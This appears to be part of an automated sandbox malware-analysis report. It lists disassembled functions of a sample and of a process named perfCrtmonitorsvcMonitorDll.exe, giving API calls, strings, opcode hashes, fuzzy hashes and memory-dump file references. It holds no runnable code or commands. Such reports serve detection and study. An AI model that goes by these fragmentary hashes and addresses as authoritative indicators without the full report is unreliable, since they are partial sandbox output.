API String ID: 0-253988292
Opcode ID: 9d61d332438db08960e694a09cbda96dfe58d6fc43ded508ca5658e231ed7add
Instruction ID: ee7751c00249df973e19f2a8bcd722ee602dacb8a6a7b8f4ceca506e7614fff6
Opcode Fuzzy Hash: 9d61d332438db08960e694a09cbda96dfe58d6fc43ded508ca5658e231ed7add
Instruction Fuzzy Hash: B041B43540239ABBCF20AF23DC41EEF77ABAF41750B105069F814A7652E774EA90CB64

Function 006F8FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 006F8FC4

Strings

about:blank, xrefs: 006F9082
Shell.Explorer, xrefs: 006F8FEF

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: cd1f317c3dbc50b71f9f6df4bec0b7e2a3f6b80fb2418a0b07c988661df2d92b
Instruction ID: 9207ae1e76a7ccce8ac7793bf6f5741fad2b74555bc9fe5e731697c239a93646
Opcode Fuzzy Hash: cd1f317c3dbc50b71f9f6df4bec0b7e2a3f6b80fb2418a0b07c988661df2d92b
Instruction Fuzzy Hash: 0721A0712043089FDB58AF68C895A7A77AAFF84711B14C46DFA098B292DF74EC01CB74

Function 006FD44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,0001042E,006FA990,?,?), ref: 006FD4C5

Strings

xjs, xrefs: 006FD4D5
GETPASSWORD1, xrefs: 006FD4BA

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$xjs
API String ID: 665744214-2419388716
Opcode ID: 1ce1dcfdb91d7b61909d6919299bc009badc570ab0d958d07865b2e8dbd06bcd
Instruction ID: ae3448f0e9b6e9686c8edcb375f5580d8e935ebd19ccfe464d39f18cf80b3d15
Opcode Fuzzy Hash: 1ce1dcfdb91d7b61909d6919299bc009badc570ab0d958d07865b2e8dbd06bcd
Instruction Fuzzy Hash: 32113B726002486BDB22EE349C06BFB37DBB706710F188074BE49A7191C7B9BC458764

Function 006EEBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 006EEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 006EEB92
Part of subcall function 006EEB73: GetProcAddress.KERNEL32(007281C0,CryptUnprotectMemory), ref: 006EEBA2

GetCurrentProcessId.KERNEL32(?,?,?,006EEBEC), ref: 006EEC84

Strings

CryptProtectMemory failed, xrefs: 006EEC3B
CryptUnprotectMemory failed, xrefs: 006EEC7C

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 79743fc9654403c07dc3e177c8b128637f2012801671f9773d0f68e7d2af78ad
Instruction ID: 11af7c82aed85550ee4333913faa44582f3f1cbd485764f7c7b80cf243f412a6
Opcode Fuzzy Hash: 79743fc9654403c07dc3e177c8b128637f2012801671f9773d0f68e7d2af78ad
Instruction Fuzzy Hash: 52115C31A073685BDB149B36DD066EE3716AF04B10B14C119FC166B3D1CB3BAE4287D9

Function 00709B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00709BBE
_free.LIBCMT ref: 00709BE4

Strings

Xq, xrefs: 00709C4B

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free
String ID: Xq
API String ID: 269201875-4164291083
Opcode ID: dc2e200a93b5667fabacef245cf9b843568b5dad6f3ae727e71f753d06bf8760
Instruction ID: a6f1c7b2a12d064774da1a421d0db17b260bfaff3bdfdc02c8b5701ee13b6f0d
Opcode Fuzzy Hash: dc2e200a93b5667fabacef245cf9b843568b5dad6f3ae727e71f753d06bf8760
Instruction Fuzzy Hash: CC11E275B00311DBEB60AB38AC45B6637D5BB52330F044326F621CB2E1E7BCC8828799

Function 006FEC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006FF25E
___raise_securityfailure.LIBCMT ref: 006FF345

Strings

8t, xrefs: 006FF340

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8t
API String ID: 3761405300-939501138
Opcode ID: b541c1913be87f55f7935f9df1650fc1a3130dc9a38ffdadf6c61d81135aac54
Instruction ID: f54e8ce6d875cef0d16e5b77e9911db04cb04f5a76d0c79bb1b0c60ade1ce774
Opcode Fuzzy Hash: b541c1913be87f55f7935f9df1650fc1a3130dc9a38ffdadf6c61d81135aac54
Instruction Fuzzy Hash: 012136BD5503148BD310EF69F9816503BA1BB4A310F10D86BEB088B3A0D3B959A5CF8C

Function 006F0889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,006F09D0,?,00000000,00000000), ref: 006F08AD
SetThreadPriority.KERNEL32(?,00000000), ref: 006F08F4

Part of subcall function 006E6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006E6EAF

Strings

CreateThread failed, xrefs: 006F08B9

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 7805d2349d7e73e3ffb19a43dc2c47011cff59490629da5d16533ba8fcf4e087
Instruction ID: d0ac4652cf7f07f0c2bbcd58c9980b9233b91a1d1fed446db9a8d45a3452d571
Opcode Fuzzy Hash: 7805d2349d7e73e3ffb19a43dc2c47011cff59490629da5d16533ba8fcf4e087
Instruction Fuzzy Hash: 2F01D6B12853096FE620AF64EC82FB6779AEB44751F10003DF686521C2CEE5A84196A8

Function 0070B2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00708FA5: GetLastError.KERNEL32(?,00720EE8,00703E14,00720EE8,?,?,00703713,00000050,?,00720EE8,00000200), ref: 00708FA9
Part of subcall function 00708FA5: _free.LIBCMT ref: 00708FDC
Part of subcall function 00708FA5: SetLastError.KERNEL32(00000000,?,00720EE8,00000200), ref: 0070901D
Part of subcall function 00708FA5: _abort.LIBCMT ref: 00709023

_abort.LIBCMT ref: 0070B2E0
_free.LIBCMT ref: 0070B314

Strings

q, xrefs: 0070B30B

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: q
API String ID: 289325740-831824133
Opcode ID: 4982febdebe4353517fd9b314235cd5f5e27199ab9930567e50ffb8f37389915
Instruction ID: 60958bffaa38a55ae9b42713753d4946b98662bc63acf393024e234e7930dd4d
Opcode Fuzzy Hash: 4982febdebe4353517fd9b314235cd5f5e27199ab9930567e50ffb8f37389915
Instruction Fuzzy Hash: D7018471D01626DBC7619F5D980125DF7E0FF54B21B19470AE960676C1CB3C6E418FC6

Function 006E130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 006EDA98: _swprintf.LIBCMT ref: 006EDABE
Part of subcall function 006EDA98: _strlen.LIBCMT ref: 006EDADF
Part of subcall function 006EDA98: SetDlgItemTextW.USER32(?,0071E154,?), ref: 006EDB3F
Part of subcall function 006EDA98: GetWindowRect.USER32(?,?), ref: 006EDB79
Part of subcall function 006EDA98: GetClientRect.USER32(?,?), ref: 006EDB85

GetDlgItem.USER32(00000000,00003021), ref: 006E134F
SetWindowTextW.USER32(00000000,007135B4), ref: 006E1365

Strings

0, xrefs: 006E130E

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 135987293b8f383fbcc8ee9bbb3ad5bdfdac4b9cd8018846827c3d905eb74772
Instruction ID: e7a9132b815e19700553cb2bda4a214aaa4a2d6fac250349035d7f65c9f40f09
Opcode Fuzzy Hash: 135987293b8f383fbcc8ee9bbb3ad5bdfdac4b9cd8018846827c3d905eb74772
Instruction Fuzzy Hash: 4EF081301013CCA6DF255F66D8097EA3B9ABB12305F098415BD4558AE2C778C595AA54

Function 006F084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,006F0A78,?), ref: 006F0854
GetLastError.KERNEL32(?), ref: 006F0860

Part of subcall function 006E6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006E6EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 006F0869

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 24356b450d273684d6ce54e3d01ff174536b7ce42f9a813c2e1e65711d329795
Instruction ID: e63930200f0b4e667a18f8a4e31e291cdbaa553bd8efb8800c9c9803bdd7b9d4
Opcode Fuzzy Hash: 24356b450d273684d6ce54e3d01ff174536b7ce42f9a813c2e1e65711d329795
Instruction Fuzzy Hash: 94D05B7150D13026DA102728EC0ADEF79575F517B0F148728F239691F5DA29095142D9

Function 006EDA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,006ED32F,?), ref: 006EDA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,006ED32F,?), ref: 006EDA61

Strings

RTL, xrefs: 006EDA5B

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 220d77dbbcccd401a6ce009e9b479931da645432cba138ec77d5157c1d40918d
Instruction ID: 9aacab538e9052585368638f038443e5de26cf7b328ac1cd4639705427970b2d
Opcode Fuzzy Hash: 220d77dbbcccd401a6ce009e9b479931da645432cba138ec77d5157c1d40918d
Instruction Fuzzy Hash: 75C0127168535076D730173D6C0EBC72D899B14B11F05449CB141DA1D0D5EDDA408650

Analysis Process: perfCrtmonitorsvcMonitorDll.exePID: 7728, Parent PID: 7676COMMON

Executed Functions

Function 00007FF887B01519 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118cfa2cf2f7a2439e5d27a0be0ddf9af22a33fdff31b7e194e7ffd631da3a22
Instruction ID: b4de4ef177460603f4eae4a9fb3b9a5750032e3549eabba13550b9e0216b0847
Opcode Fuzzy Hash: 118cfa2cf2f7a2439e5d27a0be0ddf9af22a33fdff31b7e194e7ffd631da3a22
Instruction Fuzzy Hash: 42413370D5960DCFEB59EB98C8586FDBBB2FF49350F54017AD00AEB292DA386844CB41

Function 00007FF887B0162F Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcdd6410d489533acbb96c1cb6dd3b5ed2754eb2389691a05d816fcadfb1dcc7
Instruction ID: a4a153607403c25eef15844c5e157e0086308a53395ced102bcb0f77979ec9c7
Opcode Fuzzy Hash: bcdd6410d489533acbb96c1cb6dd3b5ed2754eb2389691a05d816fcadfb1dcc7
Instruction Fuzzy Hash: 0F21F574D5850DCFEB98EB98C898AFDB7F2FF58341F14416AD00AE7295CA786880CB00

Function 00007FF887B01085 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d88d2a6ddf9077313d1682c854f8e5b7baddcc963079aa33ed5b26363dc529
Instruction ID: 3ea0d7747889704bc1e9dcfc6a3b49e380639e5fa8a64f00a8c812f34a52976d
Opcode Fuzzy Hash: 48d88d2a6ddf9077313d1682c854f8e5b7baddcc963079aa33ed5b26363dc529
Instruction Fuzzy Hash: 1E21D236A8C5AECBD724AA58EC446EE33B2FF80360F05027BC044E7192EE7C6509C681

Function 00007FF887B00E40 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd67700300587a6a3ddfbc9f9839d118158db48aa2bfd7a1628bd750c46c1e15
Instruction ID: a211f88419e371c87641698e0ef846c35879e033f36eabba44d0381d731c98a8
Opcode Fuzzy Hash: cd67700300587a6a3ddfbc9f9839d118158db48aa2bfd7a1628bd750c46c1e15
Instruction Fuzzy Hash: 5621AF74D8D28E8FE702AB60C8046FE7BB2FF16345F140276C025E62D2DA3CA509CB91

Function 00007FF887B00DC9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef5fc9888c81d8ef481c18aae383b26611d223db5aeb951975343f4beaea0091
Instruction ID: 4e59cbb650e31fa5afdda5af351aa373f6a804ca60c2835d9afc9f60dbdc52b7
Opcode Fuzzy Hash: ef5fc9888c81d8ef481c18aae383b26611d223db5aeb951975343f4beaea0091
Instruction Fuzzy Hash: 96112870D4D24A8FEB119BA4C8182BE7BB2FF45341F14457AC029B62D2DA3CA654CB82

Function 00007FF887B016F4 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df14a19aaf791c4146d981aef357ba5a52c5a1b1313533bb348b7bd0f44d506e
Instruction ID: 32df305dbbe88b3f28b392991c49dbb78439c9f148e8352fd318b6c39eaa7142
Opcode Fuzzy Hash: df14a19aaf791c4146d981aef357ba5a52c5a1b1313533bb348b7bd0f44d506e
Instruction Fuzzy Hash: A2115B7088E3C99FD7439BB088686D97FB4EF47214F1901EBD485CB0A3D66D594AC722

Function 00007FF887B014A0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7fd25edd999659236d873161a4d3e46d4454b2d5df8dd950476ef2cc8905be
Instruction ID: e224ee9b276758ecb631c4195baf487925a7c3546cad74ff6d68c90122431cd7
Opcode Fuzzy Hash: 5f7fd25edd999659236d873161a4d3e46d4454b2d5df8dd950476ef2cc8905be
Instruction Fuzzy Hash: BE01713148E3C58FC3179BB488612A83FB5BF03240F0A44EBC495CB4E3DA1C6859CB22

Function 00007FF887B00A79 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e8b3c40dcd04797d5794d64c61ae310114ac0fe84def7b3daab0dd917e2874
Instruction ID: ecc94b89441289e5d08dd7219df864181753830f6a3130db122cf212d9f4a179
Opcode Fuzzy Hash: f3e8b3c40dcd04797d5794d64c61ae310114ac0fe84def7b3daab0dd917e2874
Instruction Fuzzy Hash: CB018F7188D7C98EE756AB6488642BC7FB1FF56250F4900FAD099DA0D3DA2858A8C711

Function 00007FF887B00A90 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7cdacc387bc931b920df53e626353196b46c06a7b923adfb32bfadc0024132c
Instruction ID: e5226580d07cdac55e9c8d3afacfa4402b1f28e62f2ef15d7336b64aae2a7561
Opcode Fuzzy Hash: a7cdacc387bc931b920df53e626353196b46c06a7b923adfb32bfadc0024132c
Instruction Fuzzy Hash: 85F0BE30C9CA8D9AEB54AB6488586FD7BF1FF19354F4400BAD4AED60D2DA2855A8C210

Function 00007FF887B019A5 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa64eb943ea42776fb25f56b4de5e3d5816a6fd66ab5390a1cd07a8903458adc
Instruction ID: 2b1735b16ab68158f74e9d1608ca162dabc4219b742ec1269be61bf7a3b2f365
Opcode Fuzzy Hash: fa64eb943ea42776fb25f56b4de5e3d5816a6fd66ab5390a1cd07a8903458adc
Instruction Fuzzy Hash: 8AF06D3099864DCFDB08EF68C8492ED7BF1FF44244F1400BAE808D2181DA759262C740

Function 00007FF887B01250 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction ID: 5d7f8d512ee131a1a4308b5ec585c239946849f1e83f85e4a6025bc5ade99aa6
Opcode Fuzzy Hash: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction Fuzzy Hash: BBF0C93499851ECBEB58EA90D8909BE73B6BF95380F105639D01AE26D2DE786904DA40

Function 00007FF887B00C36 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction ID: 7e22cba15f8aa13b669b5067d7fe70b367d6419e97df15cb171e020133990c02
Opcode Fuzzy Hash: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction Fuzzy Hash: 52E01A34ECE4078AE720AB1488846FE7376FF51391F105A31D43AA22C6DE3CA145CB80

Function 00007FF887B12760 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65fe0127f8b4e02a1a102d2bd94e343a6ed67479f214afbc45d379bed57fd09d
Instruction ID: b10c42b0826824d37a4692a3069cbfef145b462b68698974be0d54a75de20a39
Opcode Fuzzy Hash: 65fe0127f8b4e02a1a102d2bd94e343a6ed67479f214afbc45d379bed57fd09d
Instruction Fuzzy Hash: 11E04F30C9854D9AEB40BBA4984C6FE77B4FF18344F100872E41DD2051EA3861D4CB41

Function 00007FF887B00C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

